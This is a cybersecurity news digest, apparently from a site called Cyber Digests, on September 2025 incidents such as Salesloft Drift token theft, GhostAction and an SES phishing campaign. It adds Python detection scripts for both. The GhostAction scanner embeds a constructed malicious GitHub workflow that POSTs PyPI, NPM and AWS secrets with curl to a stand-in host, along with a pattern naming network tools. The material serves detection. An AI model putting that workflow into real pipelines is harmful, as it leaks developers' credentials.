Cyber Digests

no noise - just real cyber news

CISA has issued an urgent warning about an actively exploited zero-day in WhatsApp's linked-device feature: the flaw lets an attacker manipulate the synchronization messages exchanged with a linked device, a foothold that can be used to steal data or install malware on the target. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog with a remediation deadline of September 23, 2025; that deadline is binding on federal civilian agencies, and critical infrastructure organizations are urged to patch on the same timeline.

Latest mentioned: 09-08
Earliest mentioned: 09-03

A widespread OAuth token theft campaign targeted Salesforce instances through the Salesloft Drift integration, affecting organizations including Palo Alto Networks and Zscaler; the threat actor used the stolen tokens to pull Salesforce data and mined it for credentials and other sensitive information. The incident highlights the need to audit third-party integrations and the tokens they hold, revoke or rotate any that are unused or exposed, and tighten access controls so that a compromised integration cannot reach more than it needs.

A newly disclosed vulnerability in Apache Jackrabbit Core and JCR Commons allows JNDI injection: `JndiRepositoryFactory` performs lookups on untrusted JNDI URIs, so an attacker who controls the URI can point the lookup at a malicious JNDI service and have attacker-supplied data deserialized, leading to remote code execution. Exploitation can result in arbitrary code execution, data exfiltration, or service disruption in the enterprise content management and web systems built on Jackrabbit.

Latest mentioned: 09-08
Earliest mentioned: 09-08

Ransomware group LunaLock has introduced a novel extortion tactic: it threatens to release stolen digital art into AI training datasets if victims refuse to pay, exploiting creators' concerns about unauthorized AI scraping and intellectual property. The attack on Artists&Clients involved encrypting files and demanding $50,000 in cryptocurrency, combining immediate operational disruption with a form of psychological pressure tailored to the victims' business.

Latest mentioned: 09-08
Earliest mentioned: 09-02

A critical vulnerability in Argo CD allows low-privileged API tokens to retrieve the credentials of all repositories associated with a project, bypassing the isolation that is supposed to scope such tokens: a token holding nothing more than basic `get` permission can read repository usernames and passwords. With those credentials an attacker can clone private codebases, inject malicious manifests, and mount supply chain attacks; all Argo CD versions up to 2.13.0 are affected. Operators should treat any repository credential that a project-scoped token could have read as exposed and rotate it after upgrading.

Latest mentioned: 09-08
Earliest mentioned: 09-05

The Czech National Cyber and Information Security Agency (NÚKIB) issued a formal warning about products and services that transfer user and system data to China, citing Chinese legal frameworks that compel companies to share data with the state; such transfers, combined with remote administration capabilities, create an avenue for misuse in the interest of the Chinese state. Threat intelligence indicates a significant increase in intrusion activity and cloud targeting by Chinese operations, underlining the supply chain risk.

Latest mentioned: 09-08
Earliest mentioned: 09-04

The Salesloft Drift supply-chain attack also led to a data breach at Zscaler, exposing customer information: the attackers used OAuth tokens stolen from the Drift integration to access Zscaler's Salesforce environment. The breach underscores the need for vigilance against phishing and social engineering, which the exposed data can be used to make more convincing, and for securing the API and OAuth tokens granted to third-party integrations as well as the authentication protocols customers rely on.

A recent phishing campaign leveraged compromised AWS access keys to weaponize Amazon Simple Email Service (SES), using novel techniques to bypass the default sandbox restrictions and achieve industrial-scale email delivery: the attackers called the SES `PutAccountDetails` API to request production access, which lifts the sandbox limits on recipients and sending volume. The campaign ran entirely through programmatic API calls and included attempted privilege escalation, pointing to sophisticated, automated tradecraft.

Latest mentioned: 09-08
Earliest mentioned: 09-04
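As an added example that is not part of the digest or of any AWS tooling, the following Python hunts for the sequence described above in CloudTrail records: reconnaissance calls, a `PutAccountDetails` call requesting production access, registration of a new sending identity, and IAM calls from the same key. The records are constructed; the field names follow CloudTrail's JSON layout, and the presence of a `productionAccessEnabled` flag in `requestParameters` is an assumption taken from the SES v2 API parameter of that name.

```python
"""Hunt for SES weaponisation in CloudTrail records.

Added example, not from the digest or from AWS. Records are constructed and
abbreviated to the fields used; the `productionAccessEnabled` flag inside
PutAccountDetails' requestParameters is an assumption taken from the SES v2
API parameter of that name.
"""
from collections import defaultdict
from datetime import datetime, timedelta

STOLEN_KEY = "arn:aws:iam::111122223333:user/ci-deploy"   # constructed principal
ADMIN = "arn:aws:iam::111122223333:user/mail-admin"       # constructed principal
SCRIPT_UA = "python-requests/2.31"

def _ev(time, name, source, arn, agent, params=None, error=None, ip="198.51.100.7"):
    """Build one abbreviated CloudTrail record (constructed sample data)."""
    return {"eventTime": time, "eventName": name, "eventSource": source,
            "userIdentity": {"arn": arn}, "sourceIPAddress": ip, "userAgent": agent,
            "requestParameters": params, "errorCode": error}

SAMPLE_EVENTS = [
    # 1. Recon from the stolen key: what state is the SES account in?
    _ev("2025-09-04T10:01:12Z", "GetAccount", "ses.amazonaws.com", STOLEN_KEY, SCRIPT_UA),
    # 2. Sandbox escape: request production sending.
    _ev("2025-09-04T10:01:40Z", "PutAccountDetails", "ses.amazonaws.com", STOLEN_KEY, SCRIPT_UA,
        {"productionAccessEnabled": True, "mailType": "TRANSACTIONAL",
         "websiteURL": "https://example.invalid"}),
    # 3. Register a sending identity the victim never used.
    _ev("2025-09-04T10:03:05Z", "CreateEmailIdentity", "ses.amazonaws.com", STOLEN_KEY, SCRIPT_UA,
        {"emailIdentity": "mail.example.invalid"}),
    # 4. Privilege-escalation attempt with the same key, denied.
    _ev("2025-09-04T10:04:00Z", "AttachUserPolicy", "iam.amazonaws.com", STOLEN_KEY, SCRIPT_UA,
        {"userName": "ci-deploy"}, error="AccessDenied"),
    # 5. Benign: an administrator checks the quota from the console hours later.
    _ev("2025-09-04T15:30:00Z", "GetSendQuota", "ses.amazonaws.com", ADMIN,
        "console.amazonaws.com", ip="203.0.113.9"),
]

RECON_CALLS = {"GetAccount", "GetSendQuota", "ListEmailIdentities", "ListIdentities"}
IDENTITY_CALLS = {"CreateEmailIdentity", "VerifyDomainIdentity", "VerifyEmailIdentity"}

def _t(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def _requests_production(ev):
    params = ev.get("requestParameters") or {}
    return ev["eventName"] == "PutAccountDetails" and params.get("productionAccessEnabled") is True

def production_access_requests(events):
    """Every successful PutAccountDetails that asks to leave the SES sandbox."""
    return [{"actor": e["userIdentity"]["arn"], "ip": e["sourceIPAddress"], "time": e["eventTime"]}
            for e in events if _requests_production(e) and not e.get("errorCode")]

def weaponisation_sequences(events, window=timedelta(minutes=30)):
    """Per principal: recon -> PutAccountDetails(production) -> new identity inside
    `window`, plus any IAM call (allowed or denied) the same key made around it."""
    by_actor = defaultdict(list)
    for e in events:
        by_actor[e["userIdentity"]["arn"]].append(e)
    findings = {}
    for actor, evs in by_actor.items():
        prod = [e for e in evs if _requests_production(e)]
        if not prod:
            continue
        t0 = _t(min(prod, key=_t))
        before = [e for e in evs if t0 - window <= _t(e) <= t0]
        after = [e for e in evs if t0 < _t(e) <= t0 + window]
        findings[actor] = {
            "recon": sum(e["eventName"] in RECON_CALLS for e in before),
            "new_identities": sum(e["eventName"] in IDENTITY_CALLS for e in after),
            "iam_calls": [(e["eventName"], e.get("errorCode")) for e in before + after
                          if e["eventSource"] == "iam.amazonaws.com"],
            # A console user agent would indicate an interactive session, not a script.
            "programmatic": all(not e["userAgent"].startswith("console") for e in evs),
        }
    return findings

if __name__ == "__main__":
    print(production_access_requests(SAMPLE_EVENTS))
    for actor, finding in weaponisation_sequences(SAMPLE_EVENTS).items():
        print(actor, finding)
```

Run as-is it reports the constructed `ci-deploy` key and nothing for the administrator; on real data, feed it the CloudTrail records for the `ses.amazonaws.com` and `iam.amazonaws.com` event sources and treat any actor with a production-access request plus a denied IAM call as a likely stolen key.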

A widespread supply chain attack, dubbed 'GhostAction', compromised hundreds of GitHub repositories by committing malicious GitHub Actions workflow files that read the repositories' CI/CD secrets and exfiltrated them, 3,325 secrets in total, including package publishing tokens and cloud credentials, some of which were then used in attempts to access AWS environments and database services. The campaign affected 327 developers across 817 repositories and touched projects in multiple programming languages as well as entire SDK portfolios.

Latest mentioned: 09-08
Earliest mentioned: 09-06
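As an added example, not from the digest nor from any published GhostAction analysis, here is a stdlib-only Python heuristic for spotting the workflow pattern described above: a `run:` step that references several `${{ secrets.* }}` values and invokes a download tool against a host outside a small allow-list. The two workflow files and the trusted-host list are constructed for the example; a real deployment would run `scan_workflow` over every file under `.github/workflows/` in the repositories it audits.

```python
"""Heuristic scan of GitHub Actions workflow text for secret exfiltration.

Added example, not from the digest or any GhostAction write-up. Stdlib only and
not a YAML parser: it finds `${{ secrets.* }}` references and `run:` steps that
call a download tool against a host outside TRUSTED. Both samples are constructed.
"""
import re
from urllib.parse import urlparse

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")
ALL_SECRETS = re.compile(r"toJSON\(\s*secrets\s*\)")   # one expression dumping every secret
URL = re.compile(r"""https?://[^\s"'`)]+""")
EGRESS_TOOLS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|iwr)\b")
RUN_LINE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")
# Hosts a build or publish step may legitimately reach (assumed allow-list).
TRUSTED = ("github.com", "githubusercontent.com", "pypi.org", "npmjs.org", "crates.io")

def run_blocks(text):
    """Return the body of every `run:` step, inline or block scalar (| or >)."""
    lines, blocks, i = text.splitlines(), [], 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, value = len(m.group(1)), m.group(2).strip()
        if value in ("|", "|-", ">", ">-"):
            body, i = [], i + 1
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > indent):
                body.append(lines[i])
                i += 1
            blocks.append("\n".join(body))
        else:
            blocks.append(value)
            i += 1
    return blocks

def external_hosts(text):
    """Hostnames of URLs in `text` that are not under a TRUSTED suffix."""
    hosts = set()
    for m in URL.finditer(text):
        host = (urlparse(m.group(0)).hostname or "").lower()
        if host and not any(host == s or host.endswith("." + s) for s in TRUSTED):
            hosts.add(host)
    return hosts

def scan_workflow(name, text):
    secrets = set(SECRET_REF.findall(text))
    dumps_all = bool(ALL_SECRETS.search(text))
    egress = set()
    for block in run_blocks(text):
        if EGRESS_TOOLS.search(block):
            egress |= external_hosts(block)
    if egress and dumps_all:
        severity = "critical"
    elif egress and len(secrets) >= 3:
        severity = "high"
    elif egress:
        severity = "medium"
    else:
        severity = "none"
    return {"workflow": name, "secrets": sorted(secrets), "dumps_all_secrets": dumps_all,
            "egress_hosts": sorted(egress), "severity": severity}

# Constructed: a normal release workflow, one secret, no ad-hoc network calls.
BENIGN = """\
name: publish
on: [push]
jobs:
  pypi:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""

# Constructed: the injected pattern, secrets mapped into env and POSTed off-box.
MALICIOUS = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: build
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_API_TOKEN }}
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s -X POST https://collector.example.invalid/ingest \\
            -d "pypi=$PYPI_TOKEN&npm=$NPM_TOKEN&aws=$AWS_ACCESS_KEY_ID:$AWS_SECRET_ACCESS_KEY"
          npm ci && npm test
"""
```

`scan_workflow("ci.yml", MALICIOUS)` rates the constructed exfiltration step `high` with `collector.example.invalid` as the egress host, while the publish workflow scores `none` because its only secret goes to a pinned action, not to a `run:` step. A `toJSON(secrets)` expression next to untrusted egress is rated `critical`, since it hands over every secret in the repository at once. The heuristic is deliberately loose: secret references inside `with:` blocks still count toward the total, so review the listed hosts rather than acting on the severity alone.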

A newly identified APT group, Noisy Bear, is conducting a highly targeted campaign against Kazakhstan's energy sector, combining sophisticated social engineering with a multi-stage infection chain built on open-source offensive tools and infrastructure from a sanctioned Russian hosting provider. The group sends spear-phishing emails from compromised internal accounts to deliver malicious LNK files that ultimately inject Meterpreter shellcode.

Latest mentioned: 09-08
Earliest mentioned: 09-04